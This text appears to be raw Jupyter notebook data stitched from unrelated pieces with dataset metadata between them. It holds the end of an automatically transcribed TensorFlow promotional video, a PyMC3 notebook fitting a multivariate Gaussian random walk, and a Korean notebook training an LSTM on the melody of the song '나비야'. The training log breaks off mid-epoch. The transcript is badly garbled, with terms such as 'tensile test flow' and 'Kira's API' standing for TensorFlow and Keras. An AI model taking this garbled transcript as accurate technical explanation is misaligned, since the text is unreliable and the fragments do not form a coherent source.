'It also supports a broad range', 'of languages API like python C++.', 'scala R JavaScript Julia and go', 'although its native a parent as pleasant to work', 'with as tensorflow.', 'It is also in the market another thing', 'that gives tensorflow Edge over other competitors is the fact', 'that it is open source and has a huge Community Support', 'that not only provides researchers a way', 'to build new models,', 'but also a platform to interact with others', 'that face some issues', 'if we talk about a simple program in terms of flow.', 'So any program basically consists of a construction phase', 'and then an execution phase the construction phase', 'where you build a graph and execution phase is', 'where you need to evaluate the graph', 'and then create a session then initialize all the variables.', 'So as you can see here in the example', 'of geometric sequencing it is so easy to execute and', 'if this is also hard for you,', \"there's a float 2.0 the latest release makes\", 'this even easier to code it has eager execution by default', 'which makes things so much simpler and easier.', 'So as you can see with either X You', 'should our program has a strong to a few lines of code.', \"So guys, that's it for the session.\", 'I hope you got to know tensorflow what exactly it is', 'and how useful it is go ahead', 'and create your own', 'deep learning models and see for yourself.', 'What an incredible framework this is till then thank you', 'and happy learning.', 'I hope you have enjoyed listening to this video.', 'Please be kind enough to like it', 'and you can comment any of your doubts and queries', 'and we will reply them', 'at the earliest do look out for more videos in our playlist', 'And subscribe to Edureka channel to learn more.', 'Happy learning.']\n"
],
[
"paragraph=\" \".join(doc)\nprint(paragraph)",
"Machine learning is a complex discipline but implementing machine learning models is far less daunting and difficult than it used to be. Thanks to machine learning Frameworks such as Google's TensorFlow that ease the process of acquiring data, training model, solving predictions and refining future results. Created by the Google brain team tensorflow is an open source library for numerical computation and large scale machine learning. Tensorflow bundles together a study of machine learning and deep learning models and algorithms and make them useful by way of common metaphor who will use machine learning and all of its products to improve the search engine the translation image captioning or the recommendations to give you a concrete example, Google users can experience a faster and more refined search with artificial intelligence. If the user types a keyword in the search bar Google provides a recommendation about what could be the next world not as a flow is being used by a lot of Companies in the industries and to name a few first let's start with Airbnb, the leading Global Online Marketplace and Hospitality service. The Airbnb ingenious and data science team applies machine learning using tensorflow to classify the images and detect objects at scale helping to improve the guest experience and we talked about the healthcare industry using tensorflow GE Healthcare is training a neural network to identify specific anatomic during the brain MRI exam to help improve speed and reliability now PayPal is using it as a flow to stay at The Cutting Edge of fraud detection using tensorflow deep trance for Learning and Generator modeling PayPal has been able to recognize complex fraud patterns to increase fraud decline accuracy while improving the experience of legitimate users through increased Precision in identification. China mobile is using tensorflow to improve their success rate of the network element cut overs Channel while has created a deep Fist amusing tensorflow that can automatically predicts the cut over time window verify log operations and detect Network anomalies and this has already successfully supported the world's largest relocation of hundreds of millions iot HSS. Let's talk about the tensorflow feature. What makes it stand out from the other competition. So Tessa flow offers multiple level of abstractions, so you can choose the right one for your needs. You can build and train models by using the high-level Kira's API, which makes getting started with tensorflow and machine learning very very easy. If you need more flexibility Iker execution allows for immediate iteration and intuitive debugging when you enable eager execution, you will be executing tensorflow kernels immediately rather than constructing graphs that will be executed later know it provides a direct path to protection whether it's on servos the S devices or the web tensorflow lets you train and deploy your model. Really no matter what language or the platform you are using you can build and train the state-of-the-art models without sacrificing speed or performance. That's the flow gives you the flexibility and the control with features like Kira's functional API and model subclassing APA for creation of complex topologies. There's a flow also supports an ecosystem of powerful add on libraries and models to experiment with the tisza flows name directly derived from its core framework. It does a flow all the computation involves tensor. So a tensor is a vector or a matrix of n Dimensions that represents the type all the operations are conducted inside a graph and the graph is set of a computation that takes place successively. Each operation is called an open note and are connected to each other. There's a flow allows the developers to create a data flow graphs which are structures that describe how the data move through a graph or a series of processing nodes. Each node in the graph represents a mathematical operation and each connection or Edge between the notes is a multi-dimensional data array or tensile test flow provides all of this for the programmer by way of the Python language by then is easy to learn and work with and provides convenient ways to express how high-level abstraction can be coupled together notes and the tensor in the tensorflow our python objects. And there's a flow applications are themselves quite an application. Now the actual math operations however are not performed in Python the libraries of transformation data available through tears flow are written as high performance C++ binaries python just directs the traffic between the pieces and provides high level programming attraction to hook them together now building a new rail. It works cannot get any more simpler. Usually any machine learning or deep learning process has some similar steps, but in this case of terms of flow it is so simple any typical machine learning life Lord any process has some of the steps like collection of data set than building the model training the network evaluating the model and then predicting the outcome in case of tensorflow. Most of the time is occupied in the collection of data set now building a model requires only a few lines of code training. The network is just a single line evaluating the network or the model itself is a single line of code and predicting. The model is also a single line of code now training a neural network cannot get any more easier than this and that is why it is the flow remains at the top when compared to the other competitors. Now, that's a for competes with a slew of other machine learning Frameworks like python or C. NT K and M. And next these are the three major Frameworks that address many of the same needs now pie torch in addition to being built in Python and as many other similarities to tensorflow the hardware accelerated components under the hood a highly interactive development model that allows for Designing as you go work and many useful components are already included. Now PyTorch is generally a better choice for fast development of projects that need to be up and running in a short time but tensorflow wins out for larger projects and more complex workflows CNTK the Microsoft cognitive toolkit, like tensorflow uses a graph structure to describe the data flow, but it focuses more on creating deep learning neural network siente que handles many neural network jobs faster and has a broader set of apis for python C++ C sharp and Java but C NT K isn't currently as easy to learn or deployed as tensorflow. No talking about Apache MXNet adopted by Amazon as a premier deep learning framework on AWS can scale almost linearly across multiple gpus and multiple machine. It also supports a broad range of languages API like python C++. scala R JavaScript Julia and go although its native a parent as pleasant to work with as tensorflow. It is also in the market another thing that gives tensorflow Edge over other competitors is the fact that it is open source and has a huge Community Support that not only provides researchers a way to build new models, but also a platform to interact with others that face some issues if we talk about a simple program in terms of flow. So any program basically consists of a construction phase and then an execution phase the construction phase where you build a graph and execution phase is where you need to evaluate the graph and then create a session then initialize all the variables. So as you can see here in the example of geometric sequencing it is so easy to execute and if this is also hard for you, there's a float 2.0 the latest release makes this even easier to code it has eager execution by default which makes things so much simpler and easier. So as you can see with either X You should our program has a strong to a few lines of code. So guys, that's it for the session. I hope you got to know tensorflow what exactly it is and how useful it is go ahead and create your own deep learning models and see for yourself. What an incredible framework this is till then thank you and happy learning. I hope you have enjoyed listening to this video. Please be kind enough to like it and you can comment any of your doubts and queries and we will reply them at the earliest do look out for more videos in our playlist And subscribe to Edureka channel to learn more. Happy learning.\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e7072fb000d04550093404ab03e745e16f20de63 | 113,158 | ipynb | Jupyter Notebook | docs/source/notebooks/MvGaussianRandomWalk_demo.ipynb | himkt/pymc3 | a3af00d98a329d580ba6494e2483348a0971dafe | [
"Apache-2.0"
] | 1 | 2021-04-20T04:45:16.000Z | 2021-04-20T04:45:16.000Z | docs/source/notebooks/MvGaussianRandomWalk_demo.ipynb | himkt/pymc3 | a3af00d98a329d580ba6494e2483348a0971dafe | [
"Apache-2.0"
] | 2 | 2017-03-02T05:56:13.000Z | 2019-12-06T19:15:42.000Z | docs/source/notebooks/MvGaussianRandomWalk_demo.ipynb | himkt/pymc3 | a3af00d98a329d580ba6494e2483348a0971dafe | [
"Apache-2.0"
] | 1 | 2018-10-08T10:27:35.000Z | 2018-10-08T10:27:35.000Z | 419.103704 | 60,678 | 0.922348 | [
[
[
"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.linalg import cholesky\n\nimport pymc3 as pm\nimport theano\n\nnp.random.seed(42)\n%matplotlib inline",
"_____no_output_____"
]
],
[
[
"Simulate the data:",
"_____no_output_____"
]
],
[
[
"D = 3\nN = 300\nsections = 5\nperiod = N/sections\n\nSigma_a = np.random.randn(D, D)\nSigma_a = Sigma_a.T.dot(Sigma_a)\nL_a = cholesky(Sigma_a, lower=True)\n\nSigma_b = np.random.randn(D, D)\nSigma_b = Sigma_b.T.dot(Sigma_b)\nL_b = cholesky(Sigma_b, lower=True)\n\n# Gaussian Random walk:\nalpha = np.cumsum(L_a.dot(np.random.randn(D, sections)), axis=1).T\nbeta = np.cumsum(L_b.dot(np.random.randn(D, sections)), axis=1).T\nsigma = 0.1\n\nt = np.arange(N)[:, None]/ N\nalpha = np.repeat(alpha, period, axis=0)\nbeta = np.repeat(beta, period, axis=0)\ny = alpha + beta*t + sigma*np.random.randn(N, 1)",
"_____no_output_____"
],
[
"plt.figure(figsize=(12, 5))\nplt.plot(t, y)\nplt.title('Three Correlated Series')\nplt.show()",
"_____no_output_____"
],
[
"class Scaler():\n def __init__(self):\n mean_ = None\n std_ = None\n \n def transform(self, x):\n return (x - self.mean_) / self.std_\n \n def fit_transform(self, x):\n self.mean_ = x.mean(axis=0)\n self.std_ = x.std(axis=0)\n return self.transform(x)\n \n def inverse_transform(self, x):\n return x*self.std_ + self.mean_",
"_____no_output_____"
],
[
"def inference(t, y, sections, n_samples=100):\n N, D = y.shape\n \n # Standardies y and t\n y_scaler = Scaler()\n t_scaler = Scaler()\n y = y_scaler.fit_transform(y)\n t = t_scaler.fit_transform(t)\n # Create a section index\n t_section = np.repeat(np.arange(sections), N/sections)\n \n # Create theano equivalent\n t_t = theano.shared(np.repeat(t, D, axis=1))\n y_t = theano.shared(y)\n t_section_t = theano.shared(t_section)\n\n with pm.Model() as model:\n packed_L_α = pm.LKJCholeskyCov('packed_L_α', n=D, \n eta=2., sd_dist=pm.HalfCauchy.dist(2.5))\n L_α = pm.expand_packed_triangular(D, packed_L_α)\n\n packed_L_β = pm.LKJCholeskyCov('packed_L_β', n=D, \n eta=2., sd_dist=pm.HalfCauchy.dist(2.5))\n L_β = pm.expand_packed_triangular(D, packed_L_β)\n\n α = pm.MvGaussianRandomWalk('alpha', shape=(sections, D), chol=L_α)\n β = pm.MvGaussianRandomWalk('beta', shape=(sections, D), chol=L_β)\n alpha_r = α[t_section_t]\n beta_r = β[t_section_t]\n regression = alpha_r+beta_r*t_t\n\n sd = pm.Uniform('sd', 0, 1)\n likelihood = pm.Normal('y', mu=regression, sd=sd, observed=y_t)\n trace = pm.sample(n_samples, cores=4)\n\n return trace, y_scaler, t_scaler, t_section",
"_____no_output_____"
],
[
"trace, y_scaler, t_scaler, t_section = inference(t, y, sections)",
"Auto-assigning NUTS sampler...\nInitializing NUTS using jitter+adapt_diag...\n 99%|█████████▉| 594/600 [08:32<00:05, 1.16it/s]/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:429: UserWarning: Chain 1 contains only 100 samples.\n % (self._chain_id, n))\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:459: UserWarning: Chain 1 reached the maximum tree depth. Increase max_treedepth, increase target_accept or reparameterize.\n 'reparameterize.' % self._chain_id)\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:451: UserWarning: The acceptance probability in chain 1 does not match the target. It is 0.536618056712, but should be close to 0.8. Try to increase the number of tuning steps.\n % (self._chain_id, mean_accept, target_accept))\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:467: UserWarning: Chain 1 contains 19 diverging samples after tuning. If increasing `target_accept` does not help try to reparameterize.\n % (self._chain_id, n_diverging))\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:429: UserWarning: Chain 2 contains only 100 samples.\n % (self._chain_id, n))\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:459: UserWarning: Chain 2 reached the maximum tree depth. Increase max_treedepth, increase target_accept or reparameterize.\n 'reparameterize.' % self._chain_id)\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:451: UserWarning: The acceptance probability in chain 2 does not match the target. It is 0.691331874096, but should be close to 0.8. Try to increase the number of tuning steps.\n % (self._chain_id, mean_accept, target_accept))\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:467: UserWarning: Chain 2 contains 8 diverging samples after tuning. If increasing `target_accept` does not help try to reparameterize.\n % (self._chain_id, n_diverging))\n100%|██████████| 600/600 [08:38<00:00, 1.16it/s]/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:429: UserWarning: Chain 0 contains only 100 samples.\n % (self._chain_id, n))\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:459: UserWarning: Chain 0 reached the maximum tree depth. Increase max_treedepth, increase target_accept or reparameterize.\n 'reparameterize.' % self._chain_id)\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:467: UserWarning: Chain 0 contains 5 diverging samples after tuning. If increasing `target_accept` does not help try to reparameterize.\n % (self._chain_id, n_diverging))\n\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:429: UserWarning: Chain 3 contains only 100 samples.\n % (self._chain_id, n))\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:459: UserWarning: Chain 3 reached the maximum tree depth. Increase max_treedepth, increase target_accept or reparameterize.\n 'reparameterize.' % self._chain_id)\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:451: UserWarning: The acceptance probability in chain 3 does not match the target. It is 0.550616532328, but should be close to 0.8. Try to increase the number of tuning steps.\n % (self._chain_id, mean_accept, target_accept))\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:467: UserWarning: Chain 3 contains 18 diverging samples after tuning. If increasing `target_accept` does not help try to reparameterize.\n % (self._chain_id, n_diverging))\n"
]
],
[
[
"Predict the mean expected y value.",
"_____no_output_____"
]
],
[
[
"a_mean = trace['alpha'][-1000:].mean(axis=0)\nb_mean = trace['beta'][-1000:].mean(axis=0)\n\ny_pred = y_scaler.inverse_transform(a_mean[t_section] + b_mean[t_section]*t_scaler.transform(t))",
"_____no_output_____"
],
[
"plt.figure(figsize=(12, 5))\nplt.gca().set_prop_cycle('color', ['red', 'green', 'blue'])\nplt.plot(t, y, '.')\nplt.plot(t, y_pred)\nplt.title('Mean Prediction of Three Correlated Series')\nplt.show()",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
e707304c74a571cd2e4293ebd735bfc27f7269ed | 287,731 | ipynb | Jupyter Notebook | notescale_LSTM.ipynb | mmeooo/test_deeplearning | 5e3a9716de253e4bf864e680b3a47f8ae8d87bd6 | [
"Apache-2.0"
] | null | null | null | notescale_LSTM.ipynb | mmeooo/test_deeplearning | 5e3a9716de253e4bf864e680b3a47f8ae8d87bd6 | [
"Apache-2.0"
] | null | null | null | notescale_LSTM.ipynb | mmeooo/test_deeplearning | 5e3a9716de253e4bf864e680b3a47f8ae8d87bd6 | [
"Apache-2.0"
] | null | null | null | 110.495776 | 136,378 | 0.648602 | [
[
[
"# '나비야' 악보 계명\n\nnote_seq = ['g8', 'e8', 'e4', 'f8', 'd8', 'd4', 'c8', 'd8', 'e8', 'f8', 'g8', 'g8', 'g4',\n 'g8', 'e8', 'e8', 'e8', 'f8', 'd8', 'd4', 'c8', 'e8', 'g8', 'g8', 'e8', 'e8', 'e4',\n 'd8', 'd8', 'd8', 'd8', 'd8', 'e8', 'f4', 'e8', 'e8', 'e8', 'e8', 'e8', 'f8', 'g4',\n 'g8', 'e8', 'e4', 'f8', 'd8', 'd4', 'c8', 'e8', 'g8', 'g8', 'e8', 'e8', 'e4']",
"_____no_output_____"
],
[
"# 악보 사전 (딕셔너리)\n\ncode2idx = {'c4':0, 'd4':1, 'e4':2, 'f4':3, 'g4':4, 'a4':5, 'b4':6,\n 'c8':7, 'd8':8, 'e8':9, 'f8':10, 'g8':11, 'a8':12, 'b8':13}",
"_____no_output_____"
],
[
"note_seq[0:4], note_seq[1:5], note_seq[2:6]",
"_____no_output_____"
]
],
[
[
"# Data preprocessing",
"_____no_output_____"
]
],
[
[
"range(len(note_seq)-4) # 4개씩 묶기 위해 50까지 출력",
"_____no_output_____"
],
[
"dataset = list()\nfor i in range(len(note_seq)-4):\n subset = note_seq[i:i+4] # [g8, e8,,,]\n items = list()\n\n for item in subset:\n items.append(code2idx[item]) # item은 key값, code2index[item]는 value값(숫자)\n \n dataset.append(items)\nprint(dataset)",
"[[11, 9, 2, 10], [9, 2, 10, 8], [2, 10, 8, 1], [10, 8, 1, 7], [8, 1, 7, 8], [1, 7, 8, 9], [7, 8, 9, 10], [8, 9, 10, 11], [9, 10, 11, 11], [10, 11, 11, 4], [11, 11, 4, 11], [11, 4, 11, 9], [4, 11, 9, 9], [11, 9, 9, 9], [9, 9, 9, 10], [9, 9, 10, 8], [9, 10, 8, 1], [10, 8, 1, 7], [8, 1, 7, 9], [1, 7, 9, 11], [7, 9, 11, 11], [9, 11, 11, 9], [11, 11, 9, 9], [11, 9, 9, 2], [9, 9, 2, 8], [9, 2, 8, 8], [2, 8, 8, 8], [8, 8, 8, 8], [8, 8, 8, 8], [8, 8, 8, 9], [8, 8, 9, 3], [8, 9, 3, 9], [9, 3, 9, 9], [3, 9, 9, 9], [9, 9, 9, 9], [9, 9, 9, 9], [9, 9, 9, 10], [9, 9, 10, 4], [9, 10, 4, 11], [10, 4, 11, 9], [4, 11, 9, 2], [11, 9, 2, 10], [9, 2, 10, 8], [2, 10, 8, 1], [10, 8, 1, 7], [8, 1, 7, 9], [1, 7, 9, 11], [7, 9, 11, 11], [9, 11, 11, 9], [11, 11, 9, 9]]\n"
],
[
"import numpy as np\n\ndatasets = np.array(dataset)",
"_____no_output_____"
],
[
"x_train = datasets[:, 0:3] # 1행에 3열씩 데이터 나눔\nx_train.shape",
"_____no_output_____"
],
[
"y_train = datasets[:,3] # dataset의 인덱스3 값만 뽑음\ny_train.shape",
"_____no_output_____"
],
[
"# 정규화: code2idx의 max값으로 나눔\n\nx_train = x_train / 13\nx_train[3]",
"_____no_output_____"
]
],
[
[
"# Make model",
"_____no_output_____"
]
],
[
[
"import tensorflow as tf",
"_____no_output_____"
],
[
"x_train.shape # Input size= 3 (컬럼 개수)\nx_train[2]",
"_____no_output_____"
],
[
"# numpy 배열(1차원 scaler) -> tensorflow type(matrix) 으로 바꾸기\n\nx_train = np.reshape(x_train, (50, 3, 1))\nx_train.shape, x_train[2]",
"_____no_output_____"
],
[
"np.unique(y_train) # y_train은 9개지만 code2idx는 총 13개임",
"_____no_output_____"
],
[
"model = tf.keras.Sequential()\n\n# Input Layer \nmodel.add(tf.keras.layers.Input(shape=(3,1)))\n# 값을 그대로 쓰는거라 embedding 할 필요 없음\n# (batch_size, timesteps, input_dim) -> (rows, cols, 1)\n# **kwargs-> dict, *kwargs-> list\n\n# Hidden Layer\nmodel.add(tf.keras.layers.LSTM(128))\n\n# Output Layer\nmodel.add(tf.keras.layers.Dense(13, activation='softmax'))\n\n# Gadget\nmodel.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])\n# onehot-encoding 안 함 -> sparse_categorical_crossentropy\n# onehot-encoding 함 -> categorical_crossentropy",
"WARNING:tensorflow:Please add `keras.layers.InputLayer` instead of `keras.Input` to Sequential model. `keras.Input` is intended to be used by Functional model.\n"
],
[
"hist = model.fit(x_train, y_train, epochs=1000, batch_size=5)\n\n# batch_size= 5 -> step size= 50/5= 10 ",
"Epoch 1/1000\n10/10 [==============================] - 0s 6ms/step - loss: 1.0589 - accuracy: 0.6000\nEpoch 2/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0471 - accuracy: 0.6200\nEpoch 3/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0825 - accuracy: 0.6000\nEpoch 4/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.1239 - accuracy: 0.5400\nEpoch 5/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0694 - accuracy: 0.5800\nEpoch 6/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0496 - accuracy: 0.6000\nEpoch 7/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0503 - accuracy: 0.5800\nEpoch 8/1000\n10/10 [==============================] - 0s 6ms/step - loss: 1.0366 - accuracy: 0.6200\nEpoch 9/1000\n10/10 [==============================] - 0s 7ms/step - loss: 1.0375 - accuracy: 0.6200\nEpoch 10/1000\n10/10 [==============================] - 0s 6ms/step - loss: 1.0522 - accuracy: 0.6200\nEpoch 11/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0449 - accuracy: 0.5400\nEpoch 12/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0417 - accuracy: 0.5600\nEpoch 13/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0381 - accuracy: 0.6000\nEpoch 14/1000\n10/10 [==============================] - 0s 6ms/step - loss: 1.0315 - accuracy: 0.6000\nEpoch 15/1000\n10/10 [==============================] - 0s 6ms/step - loss: 1.0269 - accuracy: 0.5800\nEpoch 16/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0238 - accuracy: 0.6400\nEpoch 17/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0417 - accuracy: 0.5800\nEpoch 18/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0225 - accuracy: 0.5800\nEpoch 19/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0307 - accuracy: 0.6000\nEpoch 20/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0279 - accuracy: 0.6200\nEpoch 21/1000\n10/10 [==============================] - 0s 4ms/step - loss: 1.0623 - accuracy: 0.5800\nEpoch 22/1000\n10/10 [==============================] - 0s 4ms/step - loss: 1.0224 - accuracy: 0.6000\nEpoch 23/1000\n10/10 [==============================] - 0s 4ms/step - loss: 1.0508 - accuracy: 0.6000\nEpoch 24/1000\n10/10 [==============================] - 0s 4ms/step - loss: 1.0603 - accuracy: 0.5600\nEpoch 25/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0838 - accuracy: 0.6000\nEpoch 26/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.1077 - accuracy: 0.5800\nEpoch 27/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.1045 - accuracy: 0.5200\nEpoch 28/1000\n10/10 [==============================] - 0s 4ms/step - loss: 1.0236 - accuracy: 0.5800\nEpoch 29/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0411 - accuracy: 0.5800\nEpoch 30/1000\n10/10 [==============================] - 0s 4ms/step - loss: 1.0046 - accuracy: 0.6200\nEpoch 31/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0084 - accuracy: 0.6000\nEpoch 32/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0078 - accuracy: 0.6200\nEpoch 33/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9914 - accuracy: 0.6000\nEpoch 34/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0099 - accuracy: 0.6400\nEpoch 35/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9950 - accuracy: 0.6000\nEpoch 36/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0107 - accuracy: 0.6000\nEpoch 37/1000\n10/10 [==============================] - 0s 4ms/step - loss: 1.0072 - accuracy: 0.6200\nEpoch 38/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9958 - accuracy: 0.5800\nEpoch 39/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0079 - accuracy: 0.6200\nEpoch 40/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9758 - accuracy: 0.6400\nEpoch 41/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9950 - accuracy: 0.6400\nEpoch 42/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9808 - accuracy: 0.6600\nEpoch 43/1000\n10/10 [==============================] - 0s 4ms/step - loss: 1.0261 - accuracy: 0.6400\nEpoch 44/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0700 - accuracy: 0.5200\nEpoch 45/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0332 - accuracy: 0.5800\nEpoch 46/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0397 - accuracy: 0.5400\nEpoch 47/1000\n10/10 [==============================] - 0s 4ms/step - loss: 1.0209 - accuracy: 0.6000\nEpoch 48/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9951 - accuracy: 0.6200\nEpoch 49/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9899 - accuracy: 0.6400\nEpoch 50/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9900 - accuracy: 0.6600\nEpoch 51/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9957 - accuracy: 0.6200\nEpoch 52/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9979 - accuracy: 0.6400\nEpoch 53/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9977 - accuracy: 0.6400\nEpoch 54/1000\n10/10 [==============================] - 0s 4ms/step - loss: 1.0170 - accuracy: 0.6200\nEpoch 55/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9942 - accuracy: 0.6200\nEpoch 56/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9975 - accuracy: 0.6400\nEpoch 57/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9817 - accuracy: 0.6400\nEpoch 58/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0086 - accuracy: 0.6000\nEpoch 59/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9847 - accuracy: 0.5800\nEpoch 60/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9561 - accuracy: 0.6600\nEpoch 61/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9690 - accuracy: 0.6200\nEpoch 62/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9591 - accuracy: 0.6400\nEpoch 63/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9523 - accuracy: 0.6600\nEpoch 64/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9586 - accuracy: 0.6200\nEpoch 65/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9688 - accuracy: 0.6600\nEpoch 66/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9526 - accuracy: 0.6400\nEpoch 67/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9493 - accuracy: 0.6000\nEpoch 68/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9700 - accuracy: 0.6200\nEpoch 69/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9617 - accuracy: 0.6200\nEpoch 70/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9757 - accuracy: 0.6400\nEpoch 71/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9425 - accuracy: 0.6600\nEpoch 72/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9623 - accuracy: 0.6400\nEpoch 73/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9708 - accuracy: 0.6000\nEpoch 74/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9401 - accuracy: 0.6600\nEpoch 75/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9318 - accuracy: 0.6600\nEpoch 76/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9471 - accuracy: 0.6200\nEpoch 77/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9357 - accuracy: 0.6600\nEpoch 78/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9493 - accuracy: 0.6600\nEpoch 79/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9515 - accuracy: 0.6400\nEpoch 80/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9271 - accuracy: 0.6600\nEpoch 81/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9274 - accuracy: 0.6400\nEpoch 82/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9420 - accuracy: 0.6200\nEpoch 83/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9195 - accuracy: 0.6400\nEpoch 84/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9508 - accuracy: 0.6200\nEpoch 85/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9273 - accuracy: 0.6400\nEpoch 86/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9502 - accuracy: 0.6200\nEpoch 87/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9619 - accuracy: 0.5800\nEpoch 88/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9289 - accuracy: 0.7000\nEpoch 89/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9511 - accuracy: 0.6400\nEpoch 90/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9273 - accuracy: 0.6600\nEpoch 91/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9307 - accuracy: 0.6000\nEpoch 92/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9551 - accuracy: 0.6400\nEpoch 93/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9460 - accuracy: 0.5800\nEpoch 94/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9258 - accuracy: 0.6600\nEpoch 95/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9471 - accuracy: 0.6200\nEpoch 96/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9150 - accuracy: 0.6600\nEpoch 97/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9085 - accuracy: 0.6600\nEpoch 98/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9074 - accuracy: 0.6400\nEpoch 99/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9373 - accuracy: 0.6200\nEpoch 100/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9292 - accuracy: 0.6400\nEpoch 101/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9612 - accuracy: 0.6200\nEpoch 102/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9117 - accuracy: 0.6400\nEpoch 103/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9007 - accuracy: 0.6600\nEpoch 104/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9144 - accuracy: 0.6600\nEpoch 105/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9298 - accuracy: 0.6800\nEpoch 106/1000\n10/10 [==============================] - 0s 